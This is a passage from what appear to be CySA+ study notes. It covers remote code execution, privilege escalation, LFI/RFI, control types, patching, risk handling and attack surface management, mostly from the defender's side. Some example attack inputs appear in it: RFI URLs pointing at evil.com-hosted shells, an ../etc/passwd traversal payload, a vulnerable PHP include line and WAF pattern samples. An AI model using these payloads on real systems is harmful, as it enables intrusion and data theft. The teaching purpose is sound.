network.
5. What the Attacker Wants (Goal)
● Full control over the target system
Ability to run commands, upload/download files, or extract data
Escalate privileges or pivot internally
● Often leads to complete compromise
6. Signs and Symptoms (Detection Clues)
● Unusual child processes spawned by the web server (cmd.exe, bash, powershell, etc.)
Outbound connections to unexpected IP addresses
● Use of suspicious system calls (exec, system, popen)
● Inconsistent user-agent patterns or repeated probing in logs
● Antivirus or EDR detections labeled as WebShell, Malicious Scripting, etc.
7. Mitigation Controls (with Responsible Party)

172

1. Input Validation and Sanitization
● Performed by: Application developers and software engineers
Definition: Ensure that all user input is treated strictly as data — never code. Use allowlists and strict input
constraints.
● Purpose: Prevent execution of injected code via unsanitized inputs.
● 2. Avoid Use of Dangerous Functions
● Performed by: Application developers
Definition: Functions like eval(), exec(), popen(), or system() should never be used with user input.
● Purpose: Eliminate the execution surface entirely.

3. Web Application Firewalls (WAF)
● Performed by: Security engineers and cloud security teams
● Definition: Deploy WAF rules to detect and block payloads commonly used in RCE attacks (e.g., ; ls, &amp;&amp;
whoami, wget http, etc.).
● Purpose: Block exploit attempts before they reach the application.

4. System-Level Command Restrictions
● Performed by: OS or infrastructure administrators
● Definition: Use tools like AppArmor, SELinux, or constrained shells to limit which commands or binaries a
web-facing process can access.
● Purpose: Contain damage even if code is executed.
5. Least Privilege for Web Services
● Performed by: DevOps or infrastructure teams
● Definition: Web applications should run as unprivileged users (e.g., www-data) with no access to sensitive
files or system commands.
● Purpose: Prevent privilege escalation or lateral movement.

6. Logging and Anomaly Monitoring
● Performed by: SOC team and security analysts
● Definition: Monitor for processes spawned by web services, script execution, or traffic to uncommon
ports/domains.
● Purpose: Detect RCE execution post-exploitation, especially in zero-day scenarios.

7. Runtime Application Self-Protection (RASP)
● Performed by: Security architects and application security engineers
● Definition: RASP tools instrument the application and block dangerous behaviors at runtime.
● Purpose: Real-time defense against dynamic attacks like RCE.

8. Analyst’s Role and Recommendations
As a security analyst:

173

● You don’t code the mitigation, but you must:
○ Know what RCE looks like in logs
○ Understand what is normal process behavior for your web servers
Recognize signs of child processes, outbound C2 connections, or repeated payload attempts
○ Escalate findings quickly and include recommendations for mitigation (e.g., “recommend input
sanitization review,” “advise disabling PHP eval-based routing”)

9. Reinforcement Analogy
RCE is like tricking a receptionist into not just making a phone call — but giving you the
company credit card, server room keys, and a megaphone.
You told them to “run this command,” and they did — not knowing it gave you the power to control the
building from inside.

Privilege Escalation
1. Defined Roles
● User (Victim):
A regular system user or process with limited privileges, such as a guest, employee, or software agent.
Attacker:
An adversary who has already gained some level of access to a system (via stolen credentials, malware,
or exploiting a vulnerability), but now seeks to increase their privileges to gain more control.
● Target System:
Any operating system, application, or infrastructure layer with a separation of roles and access levels (e.g.,
standard user vs. admin).
Security Analyst / SOC:
Responsible for detecting suspicious access patterns, monitoring privilege changes, investigating lateral
movement, and triggering containment or escalation.
●
● The infrastructure layer refers to the foundational systems and services that support and deliver computing
environments — beneath or around applications and operating systems.
● These include physical or virtual systems like hypervisors, cloud platforms, container runtimes,
orchestration tools, storage systems, and network appliances. Exploiting the infrastructure layer often
allows attackers to break out of isolated environments (like containers or VMs), compromise the
underlying host, or move laterally across systems that share infrastructure-level components.

2. Normal System Behavior (Before Exploitation)

174
● Users and processes are granted only the privileges they need to perform their duties (principle of least
privilege).
Privileged accounts (e.g., root, Administrator, domain admin) are limited, monitored, and protected.
● Access to system files, kernel functions, service controls, and registry keys is restricted by user role.
3. What Is Privilege Escalation?
Privilege EscalationPrivilege escalation occurs when an attacker leverages an initial foothold — such
as a compromised user account — to gain unauthorized access to higher privileges, allowing deeper
control over the system or network.
There are two major types:
● Vertical Privilege Escalation:
Gaining access to a higher level of authority (e.g., user → admin)
● Horizontal Privilege Escalation:
Gaining access to other users&#39; accounts or privileges at the same level (e.g., viewing someone else’s
medical record or inbox)

4. Attacker Goals
● Gain administrator/root-level control
● Bypass access restrictions
● Disable security tools
● Move laterally within a network
● Install persistence mechanisms
● Extract sensitive data or credentials
● Escalate from container/VM to host

5. Step-by-Step Attack Flow (Example: Vertical Privilege Escalation
on Windows)
Scenario: Attacker has access to a low-privilege user account
1. Attacker lands on system using a phishing payload or stolen credentials
2. Identifies a local privilege escalation vulnerability — e.g., unpatched CVE in Windows Task Scheduler
or service misconfiguration
3. Executes an exploit to abuse the vulnerability and gain SYSTEM or Administrator privileges
4. Accesses protected resources, dumps password hashes, disables AV, or creates backdoor admin
accounts
5. Covers tracks or begins lateral movement into other systems

175

6. How Does Privilege Escalation Happen?
Common Vulnerabilities and Tactics (with Definitions)
● Unpatched Local Vulnerabilities:
Definition: Security flaws in the operating system or software that have not yet been fixed (patched) and can
be exploited locally by a user or attacker already on the system.
Example: A known CVE (Common Vulnerabilities and Exposures) allowing any user to gain admin rights via
a scheduled task exploit.
● Misconfigured Services Running as SYSTEM or Root:
Definition: Background services configured to run with maximum privileges but without proper restrictions. If
a low-privilege user can interact with or modify the service, they may hijack its execution.
Example: A writable service binary or unquoted service path on Windows.
● Writable Files or Directories in the PATH Environment:
Definition: The PATH environment variable tells the OS where to look for executable files. If an attacker can
place a malicious file in a directory that appears earlier in PATH than the legitimate binary, the system might
run the attacker’s file instead.
Example: Dropping a fake net.exe in a writable folder listed in PATH.
● DLL Injection Opportunities:
Definition: Windows applications often load Dynamic Link Libraries (DLLs). If a program loads a DLL without
checking the full path (a common misconfiguration), an attacker can place a malicious DLL in the search
path and have it loaded with elevated privileges.
Result: Code runs in the context of the privileged application.
●
● Exploitable setuid Binaries (Linux):
Definition: On Linux/Unix systems, setuid is a permission flag that allows a program to run as the file owner
(often root). If the binary contains flaws, a regular user might exploit them to execute commands as root.
Example: A setuid script that calls system functions without input validation.
● Tokens or Credentials Stored Insecurely:
Definition: Sensitive authentication material (e.g., access tokens, API keys, passwords) that are stored in
plain text or memory where an attacker with local access can extract them.
Result: The attacker impersonates a higher-privileged user or service.
● Weak Folder Permissions or Unquoted Service Paths:
Definition: If system folders or service definitions allow modification by non-admin users, attackers can
overwrite binaries or redirect services to launch malicious code.
Unquoted service paths: On Windows, services with spaces in their path (e.g., C:\Program Files\My
App\myapp.exe) can be misinterpreted by the system if not properly quoted. An attacker could drop a
malicious file at C:\Program.exe.
7. Detection Clues and Logging Indicators
Monitored by: Security analysts, EDR systems, and SIEM
● Sudden privilege level change (e.g., standard user spawns SYSTEM process)
● Creation of new admin accounts
● Access to sensitive system files or SAM database
● Use of tools like whoami, token::elevate, or runas
● Processes launched from unusual locations
● Unexpected modification of services or registry keys
● Execution of known exploit binaries (e.g., Mimikatz)
●
What is the SAM Database?

176

The Security Account Manager (SAM) database is a critical Windows system file that stores
usernames and hashed passwords for all local user accounts on the machine.
● It is located in:
C:\Windows\System32\config\SAM
(but is normally locked and protected by the system)
SAM works alongside the LSASS (Local Security Authority Subsystem Service) to authenticate users
locally.
Attackers often try to access the SAM database to extract password hashes — which can then be cracked
offline or used in pass-the-hash attacks.
● Sidebar: Analogy – The SAM Database Is Like a Locked Vault of
Fingerprints
● Think of the SAM database as a vault inside your house that stores everyone’s fingerprints — not
the actual keys, but just enough information to identify and verify who should be allowed through
each door.
● In a secure home, only the homeowner (Administrator or SYSTEM) has the key to open that vault.
● But if an intruder sneaks in, finds a way to copy those fingerprint templates (hashed passwords),
they can forge identity — either by cracking them into usable credentials or using tools to mimic a
legitimate user without knowing the password.
● Accessing that vault is never something a normal houseguest would do — and in cybersecurity,
it’s a massive red flag that someone inside the system is trying to escalate or impersonate authority.
8. Mitigation Controls (with Responsible Party)
1. Patch Management
● Performed by: IT ops / system administrators
● Definition: Apply updates for OS and applications regularly to close known privilege escalation paths
Purpose: Prevent exploitation of known vulnerabilities

2. Principle of Least Privilege
● Performed by: Identity and Access Management (IAM) teams
● Definition: Users and processes should only have the access they absolutely need
● Purpose: Minimize damage if a lower-privilege account is compromised

3. Restrict Local Admin Rights
● Performed by: IT administrators / security engineers
● Definition: Use group policies to prevent widespread use of local admin
● Purpose: Contain lateral movement and local exploitation

4. Secure File and Folder Permissions
● Performed by: System administrators

177
● Definition: Ensure critical directories, executables, and config files cannot be modified by non-privileged
users
● Purpose: Prevent abuse of writable paths
5. Application Whitelisting
● Performed by: Endpoint security teams
● Definition: Block execution of unauthorized binaries or scripts
Purpose: Prevent the launch of privilege escalation tools or exploits
6. EDR and SIEM Monitoring
● Performed by: Security analysts
Definition: Monitor logs and behaviors for signs of privilege abuse (e.g., whoami, token stealing, local
exploit attempts)
● Purpose: Detect escalation attempts early and contain compromise

7. Container and Cloud Role Hardening
● Performed by: DevOps / Cloud Security Engineers
● Definition: Enforce isolation between containers/VMs and hosts, restrict IAM roles in cloud environments
● Purpose: Prevent escalation from containerized app to host system or cloud root access
9. Reinforcement Analogy
Privilege escalation is like sneaking into a hospital as a visitor, then finding a spare badge that
opens the surgical suite.
You weren’t supposed to be there — but now you can open doors, access confidential files, and
rewrite records.
In vertical escalation, you jump from “visitor” to “chief of surgery.” In horizontal escalation, you’re still a
visitor, but now impersonating someone else.

Topic: Local File Inclusion (LFI) / Remote File Inclusion (RFI)
1. Defined Roles
● User (Victim): A normal user interacting with a web application, typically via a browser.
● Web Server (Target): A system hosting a web application that allows user-supplied input to specify or
include files.
● Attacker: A threat actor attempting to trick the web server into loading files they should not access (local or
remote).
● Security Analyst / SOC: Monitors server logs, inspects suspicious inputs or file requests, investigates file-
based exploitation indicators.
2. Normal System Behavior (Before Exploitation)

178

Many web applications allow user input to dynamically reference files — such as:
Choosing a theme or language: site.com?lang=en
Loading content from the file system: site.com?page=about.html
Pulling templates or scripts from modular locations
Pulling templates or scripts from modular locations refers to the web application loading reusable interface
components (like headers, footers, menus, or entire layout templates) from organized folders of shared
files.
Unlike choosing a language (bullet 1) or loading static content (bullet 2), this involves dynamic inclusion of
building blocks that define how the application looks or behaves — often based on user input or URL
parameters.
In secure systems:
● Only expected files are loaded
● Input is sanitized
● External file loading is disabled unless explicitly needed
3. What Is File Inclusion?
File Inclusion vulnerabilities allow attackers to manipulate user-supplied input to force the server to
load and execute unintended files, either from the local file system (LFI) or a remote location
(RFI).
Types:
● Local File Inclusion (LFI):
Attacker tricks the server into loading a file that already exists on the same server
→ Example target: /etc/passwd, C:\Windows\win.ini
● Remote File Inclusion (RFI):
Attacker supplies a URL or remote path to a malicious file that the server loads and possibly executes
→ Example: site.com?page=http://evil.com/shell.php
4. Attacker Goals
● Access sensitive local files (e.g., config files, credentials, tokens)
Execute arbitrary code via remote scripts (in RFI)\
● Bypass authentication or authorization
● Establish a web shell or persistent foothold
5. Step-by-Step Attack Flow (Example: LFI Exploit)
Scenario: Poorly coded web app with dynamic page loading
1. Attacker visits:
site.com?page=about.html

179

2. Application uses PHP or similar to include the file:
include($_GET[&#39;page&#39;]);
Attacker modifies the input to:
site.com?page=../../../../etc/passwd (LFI example)
3. Server loads /etc/passwd and displays its contents to the attacker
Summary: LFI vs. Directory Traversal
Although Local File Inclusion (LFI) and Directory Traversal attacks often use similar input patterns—such as
../../../etc/passwd—they target different system behaviors. Directory Traversal exploits file path manipulation to read
restricted files on the server without executing them. In contrast, Local File Inclusion (LFI) targets vulnerabilities
where the server is configured to dynamically include files into its code execution flow, potentially processing or
running their contents. In short, directory traversal is about unauthorized access, while LFI is about unauthorized
inclusion or execution. Understanding this distinction is essential for identifying the attacker&#39;s goals and applying
the correct mitigation strategies.

Helpful Analogy:
Directory Traversal is like sneaking into a filing cabinet and reading someone else&#39;s folder.
LFI is like telling the system to load and use that folder as part of its logic, possibly executing
what&#39;s inside.

Step-by-Step RFI Variant
1. Vulnerable PHP app includes external files without validation
include($_GET[&#39;template&#39;]);
2. Attacker sets URL to:
site.com?template=http://evil.com/malicious.php
3. Server fetches and executes malicious code hosted remotely
6. Detection and Logging Indicators
Monitored by: Security analysts, WAF logs, and application telemetry
● Requests with traversal sequences like ../, ..%2F, or encoded forms
● Attempts to access sensitive files (e.g., /etc/passwd, boot.ini)
External URLs passed into parameters (http://, ftp://)
● Abnormal script execution or file access from the web root
● Sudden web shell behavior (new files, commands being issued)
7. Mitigation Controls (with Responsible Parties)
Mitigation Definition Responsible
Party

180

Input
Validation

Block or sanitize path traversal
attempts (../)

Application
developers /
DevOps

Whitelisting
Allowed Files

Only permit loading of known-safe
files

Developers

Disable
Remote URL
Inclusion

On PHP: allow_url_include = Off Server
administrators

Use Static
File
References

Avoid dynamic include() from user
input

Developers

Least
Privilege File
Permissions

Even if inclusion is attempted,
critical files are inaccessible

System
administrators

WAF Rules Block inclusion patterns in requests Security
engineers

Log
Monitoring

Detect file access anomalies or
unusual GET parameters

SOC /
Security
analysts

8. Reinforcement Analogy
LFI/RFI is like a receptionist who normally fetches documents from a secure file cabinet.
If they take file names from visitors without checking, a malicious visitor might say:
“Please grab document ../../../../bank-passwords.txt from your files” — and the receptionist
unknowingly hands over sensitive material.
In an RFI case, it’s worse: the attacker says,
“Please download and run this new policy file from my website.”
And the system complies — unknowingly executing attacker code.

181

2.5 Given a scenario, analyze data to prioritize
vulnerabilities.
Concept: Compensating Control (in Vulnerability Response and
Management)

✅ Definition
A compensating control is a security measure implemented as a substitute for a primary control that is not
currently feasible or possible due to technical, operational, or business constraints.
It doesn&#39;t eliminate the underlying vulnerability, but it reduces the associated risk to an acceptable level until
the preferred or permanent solution can be applied.
�� Plain English Explanation
A compensating control is a “plan B” — a backup safety measure put in place when you can&#39;t
fix the root problem right away, but you still need to reduce the risk of exploitation.
�� Healthcare Analogy
Think of a compensating control like prescribing antibiotics for an infection while you prepare
for surgery.
The infection isn&#39;t cured yet (the surgery is the actual fix), but the antibiotic reduces the risk
and buys you time safely.
�� Cybersecurity Example
Let’s say there’s a vulnerability in a web application that cannot be patched immediately due to software
compatibility issues.
● Primary Control (Ideal Fix): Apply the vendor patch
● Compensating Control: Deploy a Web Application Firewall (WAF) to block exploit attempts targeting
the vulnerability
�� When Are Compensating Controls Used?
● Patching is not immediately possible
● Legacy systems that cannot be upgraded
● Vendor delays or operational dependencies
● High availability systems where downtime is restricted
● �� Important Requirements (Especially for Audits like PCI DSS):
To be considered valid, a compensating control must:

182

● Fully address the intent of the original control
Be documented and justified
● Be tested for effectiveness
● Be temporary, not permanent
● �� Summary Bullet Points
● A compensating control does not remove the vulnerability, but mitigates the risk
It’s a temporary workaround used when the ideal fix is not currently possible
● Common examples: segmentation, WAF rules, increased monitoring, access restrictions
● Used frequently in vulnerability management plans and compliance frameworks
●

��️ Control Types in Cybersecurity
Controls are safeguards put in place to reduce risk, prevent attacks, detect threats, and respond to or
recover from security events. Controls are categorized in two main ways:
1. By Function (What the control does)
2. By Implementation Type (How the control is applied)
Clarifying Note: Two Dimensions of Controls
Controls are classified in two distinct dimensions:
● By Implementation Type (How):
These describe how the control is enforced — whether it’s a technical system, a human process, or
a policy decision.
Examples: Technical, Operational, Managerial
● By Function (What):
These describe what the control is designed to accomplish in the security lifecycle.
Examples: Preventive, Detective, Corrective, Responsive
Important: Many study materials blur these categories. For example, they may list “technical”
and “preventive” together — but those describe different things.
● “Technical” is about how the control is applied
● “Preventive” is about what the control is intended to do
�� 1. Control Types by Implementation
These define how a control is implemented or who is responsible for it.
��‍�� Managerial Controls

183

High-level policy- and procedure-based controls set by leadership or governance teams.
● Purpose: Guide security strategy, compliance, and organizational behavior.
● Examples:
○ Acceptable use policies (AUP)
○ Security training mandates
○ Risk assessments
○ Vendor management procedures
��️ Operational Controls
Day-to-day processes carried out by people, usually part of IT or security operations.
● Purpose: Ensure security is maintained through consistent human actions.
●
● Examples:
○ User provisioning procedures
○ Data backup processes
○ Physical security walkthroughs
○ Log review practices
○ �� Technical Controls (Also called Logical Controls)
Controls enforced by hardware or software.
● Purpose: Prevent or detect threats automatically, often at high speed or scale.
● Examples:
○ Firewalls
○ Encryption
Intrusion Detection Systems (IDS)
○ Multi-factor authentication

�� 2. Control Types by Function
These define what the control is intended to achieve in the security lifecycle.
�� Preventive Controls
Stop incidents before they occur.
● Examples:
○ Account lockout policies
○ Access control lists (ACLs)
Security awareness training
○ Secure configuration baselines

184

○
○ �� Detective Controls
Identify and alert when an incident is occurring or has occurred.
● Examples:
○ Log monitoring
○ Intrusion Detection Systems (IDS)
○ File integrity monitoring
○ Audit trails

��️ Corrective Controls
Restore systems or processes to a secure state after an incident.
● Examples:
○ Patching a vulnerability
○ Reimaging a compromised machine
○ Revoking compromised credentials

�� Responsive Controls
(Also called Recovery or Compensating Controls in some contexts)
Minimize the impact and respond in real-time to ongoing incidents.
● Examples:
○ Automated quarantine of infected hosts
○ Failover to backup systems
○ Temporarily disabling affected services

�� Quick Reinforcement Summary
Type Focus Examples

Managerial Policies &amp; planning Security policies, risk assessments

185

Operational People &amp; procedures Backups, access reviews, manual reviews

Technical Software &amp; hardware Firewalls, antivirus, MFA

Preventive Stop threats Least privilege, patching, lockout rules

Detective Spot threats IDS, log monitoring, anomaly detection

Corrective Fix after attack Reboot, reimage, revoke access

Responsive Contain/dampen
impact

Quarantine, block IP, failover systems

�� Patching and Configuration Management
This process ensures systems are securely maintained by applying updates, managing
settings, and avoiding misconfigurations. It includes a full lifecycle: testing, implementation,
rollback, and validation.
�� Definition (High-Level)
Patching refers to the process of applying software updates to fix vulnerabilities, bugs, or performance
issues.
Configuration management refers to maintaining secure and consistent system settings across
environments.
Both are essential to vulnerability management, compliance, and incident prevention.
�� Normal Behavior Before Exploitation
● Vendors release patches to fix known security issues (often listed in CVEs).
● Organizations manage a patching cycle to reduce exposure.
● Secure configurations (e.g., disabling unused services, enforcing TLS, logging settings) are
maintained and version-controlled.

186

�� Healthcare Analogy
Think of patching like prescribing medication after discovering a vulnerability in the body (e.g.,
a pathogen). Configuration management is like adjusting lifestyle or equipment settings — e.g.,
calibrating a pacemaker or setting dietary restrictions — to prevent problems from recurring.

�� Phases of Patching and Configuration Management
✅ 1. Testing
● Purpose: Ensure updates don’t break system functionality or introduce side effects.
● Performed by: QA engineers, DevOps teams, or IT admins in staging environments.
● Example: Test a patch in a sandbox to verify it doesn’t disrupt business-critical services.
● Security Relevance: Prevent introducing new vulnerabilities or outages during updates.
✅ 2. Implementation
● Purpose: Apply the approved patch or configuration change to live systems.
● Performed by: IT administrators, DevOps teams.
● Example: Push an operating system patch across production servers.
● Security Relevance: Closes known vulnerabilities, hardens the system.
✅ 3. Rollback (Contingency Plan)
● Purpose: Revert the system to its prior state if the patch or config causes failure.
● Performed by: Same team that performed implementation (IT/DevOps).
● Requires: Snapshots, backups, version-controlled configs.
● Security Relevance: Ensures business continuity and avoids accidental denial of service.
✅ 4. Validation
● Purpose: Confirm that the change was successfully applied and that the system is stable.
Performed by: System administrators, security teams, compliance auditors.
● Includes: Post-patch scanning, configuration drift checks, performance tests.
● Security Relevance: Confirms vulnerability is closed, and system behaves securely.
�� Security Benefits
Phase Why It Matters

Testing Prevents damage, downtime, or new vulnerabilities

187

Implementation Eliminates known exploits

Rollback Enables safe recovery in case of failure

Validation Confirms success and logs proof for compliance and audits

�� Common Pitfall Example
A company skips validation and assumes a patch was applied — but due to a permissions
error, the patch fails silently. Months later, an attacker exploits the known CVE, which was
thought to be fixed. This shows the critical need for full-cycle management.

��️ Maintenance Windows in Cybersecurit
Operations
�� Definition
A maintenance window is a scheduled period of time during which routine or critical system changes can be
safely performed — such as applying patches, updating configurations, or restarting services — with
minimal disruption to users or business operations.
�� Why Maintenance Windows Matter in Cybersecurity
● Reduce the risk of downtime during high-traffic hours
● Allow for structured testing and rollback
● Help coordinate security patches and system hardening without interfering with core operations
● Ensure that changes (especially security updates) occur predictably and with accountability
�� Analogy (Healthcare Setting)
Think of a hospital planning a scheduled surgery: it doesn’t happen during peak emergency
hours. Instead, it’s booked during a low-risk period when staff, equipment, and post-op
monitoring are fully prepared. That’s what a maintenance window is in IT — safe, intentional
change during low-risk time.
�� Maintenance Window Planning Lifecycle

188

✅ 1. Scheduling
● Performed by: System administrators, IT operations, or change management teams
● Goal: Select low-usage hours (e.g., overnight or weekend windows) to minimize user disruption and
allow focused monitoring
● Security Relevance: Low-usage periods reduce the likelihood of incomplete patch exposure, open
services during changes, and allow clean rollback if errors occur — reducing the window of
vulnerability where attackers could exploit a half-patched system.
✅ 2. Notification
● Performed by: Operations, project managers, or change control committees.
● Goal: Notify users, SOC teams, and stakeholders in advance.
● Security Relevance: Reduces confusion over changes in behavior (e.g., outage alarms).
✅ 3. Execution
● Performed by: IT or DevOps teams, sometimes with SOC oversight.
● Goal: Apply patches, reconfigure services, or update software.
● Security Relevance: Mitigates vulnerabilities during a planned, controlled window.
✅ 4. Monitoring &amp; Rollback
● Performed by: System admins and security monitoring teams.
Goal: Detect unexpected behavior, revert changes if needed.
Security Relevance: Ensures changes don’t create new attack surfaces.
✅ 5. Validation &amp; Documentation
● Performed by: Security analysts, auditors, compliance officers.
● Goal: Confirm success, document outcomes, update asset and risk inventories.
● Security Relevance: Provides proof for compliance, audit trails, and forensic review.
�� Security Tie-In
● Maintenance windows help reduce risk of zero-day exploitation by enforcing timely patch cycles.
They enable controlled vulnerability remediation with support from SOC, SIEM, and log analysis
tools.
Lack of maintenance discipline is often cited in breaches involving unpatched systems or
misconfigurations.

Exceptions
(CySA+ Topic: Vulnerability Response, Handling, and Management)

189

Definition
● An exception is a formally documented decision to delay, limit, or skip a patch, secure configuration, or
other recommended security action due to a valid operational or business reason.
● It does not mean ignoring risk — it means consciously managing it with compensating controls and
clear documentation.

Why Exceptions Exist
● Patches may break applications or cause outages.
● Legacy systems may not support modern updates.
● Business-critical operations may require delay or timing changes.
● Vendors may control updates for proprietary software.
Risk-based prioritization may push remediation downstream for lower severity vulnerabilities.
Real-World Analogy
A doctor avoids prescribing a standard drug because the patient is allergic — this is an exception.
The risk is acknowledged, an alternative is chosen, and it&#39;s documented in the medical record.
Exception Handling Process
● Request:
○ System owner or business unit submits the exception request.
○ Must explain why remediation can’t proceed immediately.
● Review:
○ Security team or risk committee evaluates the risk.
○ May conduct a threat assessment or consult a vulnerability database.
● Approval:
○ Security officer, CISO delegate, or change management board grants a time-bound or scoped
exception.

● Mitigation (Compensating Controls):
○ Apply alternatives such as:
■ Network segmentation
■ Firewall restrictions
■ Enhanced monitoring
■ Privilege reduction
■ Intrusion detection alerts

● Tracking &amp; Reassessment:

190

○ The exception is tracked, logged, and re-reviewed on a schedule.
○ If the issue becomes patchable or risk increases, the exception may be revoked.
Security Implications
● Exceptions are necessary but must be limited, justified, and monitored.
● Unchecked exceptions lead to hidden vulnerabilities and expanded attack surfaces.
Tracking exceptions is part of mature risk management and is often reviewed during audits or compliance
checks.
�� Risk Management Principles
�� Definition
Risk management is the structured process of identifying, evaluating, and responding to cybersecurity risks in a way
that aligns with business goals, system criticality, and acceptable risk levels.
Security teams, CISOs (Chief Information Security Officers), and business leadership use four fundamental strategies
to make informed decisions about vulnerabilities or threats.
✅ The Four Core Risk Response Strategies
1. Accept the Risk
● What it means:
Acknowledging that a risk exists but deciding not to act — usually because the cost or effort of mitigation
outweighs the potential damage.
● Who decides:
Business leadership, CISO, risk officer
● Use case examples:
○ A vulnerability exists on a non-critical printer in a locked office
○ A legacy system has a known issue, but exploitation is highly unlikely and patching is cost-
prohibitive.
● Analogy:
A hospital knows a lightbulb flickers in a storage room but chooses not to fix it right away — it’s low impact
and non-urgent.
2. Transfer the Risk
● What it means:
Shifting the risk to another party, often through insurance or outsourcing responsibilities.
Who decides:
Legal, compliance, and financial leadership with IT/Security input
● Use case examples:
○ Buying cyber liability insurance
○ Hosting a web application on a cloud provider with shared security responsibility
○ Outsourcing security monitoring to a managed security service provider (MSSP)

191

● Analogy:
A medical clinic hires a third-party billing service. If there&#39;s a billing data breach, the liability is shared
under the service agreement.

3. Avoid the Risk
● What it means:
Eliminating the risk entirely by choosing not to engage in the risky activity or disabling the vulnerable
feature.
● Who decides:
Product management, IT architecture, and leadership
Use case examples:
○ Not using a deprecated protocol like SMBv1
○ Removing an internet-facing web app no longer maintained
○ Declining to store credit card data directly
● Analogy:
A hospital chooses not to install a wireless device in a critical care unit due to interference concerns — no
risk if it’s not there.
4. Mitigate the Risk
● What it means:
Reducing the likelihood or impact of a risk by applying security controls, patches, or compensating
mechanisms.
● Who decides:
Security analysts, engineers, and leadership
● Use case examples:
○ Apply a patch for a known vulnerability
○ Restrict admin privileges on user accounts
○ Enable multi-factor authentication (MFA)
● Analogy:
A hospital doesn’t eliminate the infection risk in a surgical suite, but it installs HEPA filters, enforces scrub
protocols, and monitors air quality — the risk is mitigated
�� Summary
● Accept = Acknowledge and live with the risk
● Transfer = Shift responsibility via contracts or insurance
Avoid = Eliminate the risk entirely
Mitigate = Reduce the threat or impact through technical or procedural controls
��️ Policies, Governance, and Service-Level Objective
(SLOs)

192

�� 1. Security Policies
● Definition:
Formal documents that define an organization’s rules, expectations, and requirements for cybersecurity
behavior and technology usage.
● Purpose:
Establish a consistent foundation for security decisions, employee behavior, and technical enforcement.
● Examples:
○ Acceptable Use Policy (AUP)
○ Password Policy
○ Incident Response Policy
○ Data Retention Policy
● Who creates/enforces it:
○ Created by: Security leadership (CISO, policy teams)
○ Enforced by: IT, HR, legal, and security operations
● Why it matters in vulnerability response:
Security teams must follow defined policies for handling vulnerabilities, such as timelines for patching
critical systems or escalating incidents.
�� 2. Governance
● Definition:
The oversight structure that ensures cybersecurity policies, controls, and decisions align with
organizational goals and legal/regulatory requirements.
● Key Functions:
○ Assign roles and responsibilities (e.g., who owns risk decisions)
Enforce accountability through audits and reporting
○ Drive continual improvement in security posture
● Governance Structures May Include:
○ Risk Management Committees
○ Security Steering Committees
CISO or Security Governance Office
○ Compliance review teams
● Why it matters in vulnerability response:
Governance ensures that vulnerability management programs are measurable, consistent, and aligned
with business risk tolerance. It answers:
○ What is our patching SLA?
○ Who approves exception requests?
○ How is risk communicated to leadership?
○
○ �� 3. Service-Level Objectives (SLOs)
● Definition:

193
A measurable goal that defines the expected performance or response level of a service or system —
often related to uptime, patching, or incident response timelines.
● Examples:
“Critical vulnerabilities must be patched within 72 hours.”
“SIEM alerts must be reviewed within 15 minutes.”
○ “99.9% system uptime per month.”
● Who defines them:
Typically set by IT leadership, security teams, or in contracts (e.g., SLAs)
● Why SLOs matter for vulnerability management:
○ Drive urgency and accountability
○ Ensure consistent tracking of remediation speed
○ Can trigger automated escalations or audits if missed.

�� How They All Fit Together
Concept Role in Security Program

Policy Defines what must be done (rules)

Governance Ensures it is actually done (oversight)

SLOs Measures how quickly or well it&#39;s done (performance targets)

✅ Real-World Example:
A company has a vulnerability remediation policy that says all critical CVEs must be patched within
72 hours.
The governance team regularly audits patch timelines across departments.
An SLO tracks whether systems meet the 72-hour patching window, and missed targets are flagged
for review or escalated.

⚠️ Prioritization and Escalation
(Key Concepts in Vulnerability Response &amp; Security Operations)
�� 1. Prioritization
Definition:

194
The process of ranking vulnerabilities, alerts, or incidents based on business risk, severity, exploitability, and
impact — so the most critical issues are addressed first.
✅ What Is Prioritized?
● Vulnerabilities (e.g., CVSS score 9.8 vs. 5.4)
● Incidents (e.g., ransomware vs. spam)
System Assets (e.g., a public-facing server vs. a test workstation)
● User Accounts (e.g., a domain admin vs. a temporary contractor)
�� How It’s Done:
Security teams use a combination of:
● Threat intelligence (Is this vulnerability being exploited in the wild?)
● Asset criticality (Is this system mission-critical?)
● Exploitability (Is there working proof-of-concept code?)
● Business impact (Could this disrupt operations or expose sensitive data?)
��‍�� Who Performs It:
● SOC analysts
● Vulnerability management teams
● Risk officers
Incident responders
�� Real-World Example:
A vulnerability scanner finds 500 vulnerabilities. Only 10 have a CVSS score over 9.0 and affect
public-facing systems.
These 10 are prioritized for immediate remediation. The rest are scheduled over the coming weeks.
�� 2. Escalation
Definition:
The formal process of handing off a security issue to higher authority or specialized teams when its scope,
severity, or complexity exceeds current team capabilities.
�� When to Escalate:
● The incident is above a defined severity threshold
● The system or account involved is high-value or privileged
● The attack involves multiple systems or external actors
Internal tools can&#39;t contain, analyze, or resolve the issue

�� Escalation Levels (Typical SOC Flow):
1. Tier 1 SOC Analyst
Basic triage, filtering false positives

195

2. Tier 2 SOC Analyst or Security Engineer
Correlation, deeper investigation
3. Incident Response Lead or Forensics Team
Full containment, recovery, legal notification
4. CISO or Executive Leadership
Strategic communication, regulatory decisions
��‍�� Who Owns It:
● Analysts initiate escalation
● Security operations center (SOC) leads track and approve
CISOs and executive stakeholders are looped in as needed
�� Key Purpose of Escalation
● Prevent delays in action during high-severity threats
Ensure correct expertise is applied to the issue
● Align response with business and legal risk
Summary: Prioritization and Escalation
● Prioritization
Focuses on ranking security issues (e.g., vulnerabilities, incidents, assets) based on their risk and urgency.
Ensures that the most dangerous or business-critical threats are handled first.
○ Used by:
■ SOC analysts
■ Risk teams
■ Vulnerability managers
■ Incident responders

● Escalation
○ Involves passing an issue to higher-level staff or specialized teams when it exceeds the current
team’s authority or technical capacity.
○ Ensures rapid and appropriate response to serious or complex security threats.
○ Used by:
■ Tiered SOC teams (Tier 1 → Tier 2 → IR Lead)
■ Forensics or legal teams (as needed)
■ Executive leadership (CISO, legal, compliance)
■
■

�� Attack Surface Management (ASM)
�� Definition

196
Attack Surface Management is the continuous process of identifying, analyzing, and reducing all possible entry points
(known as the “attack surface”) that an attacker could exploit in an organization’s environment — including devices,
applications, user accounts, cloud resources, APIs, exposed services, and more.

�� What is the Attack Surface?

● Any system, port, application, or pathway that is reachable from inside or outside the network
Includes:
○ Public-facing web servers and APIs
○ Cloud buckets and services
○ Email servers and endpoints
○ Forgotten subdomains or test environments
○ Employee credentials exposed online
○ Weak or unused services (e.g., SMBv1)
��️‍��️ Core Activities of ASM
• Edge Discovery

● What it is:
Identifying externally visible systems at the “edge” of your network — often exposed to the public internet
● How it&#39;s done:
Passive DNS lookups, IP sweeps, TLS certificate monitoring
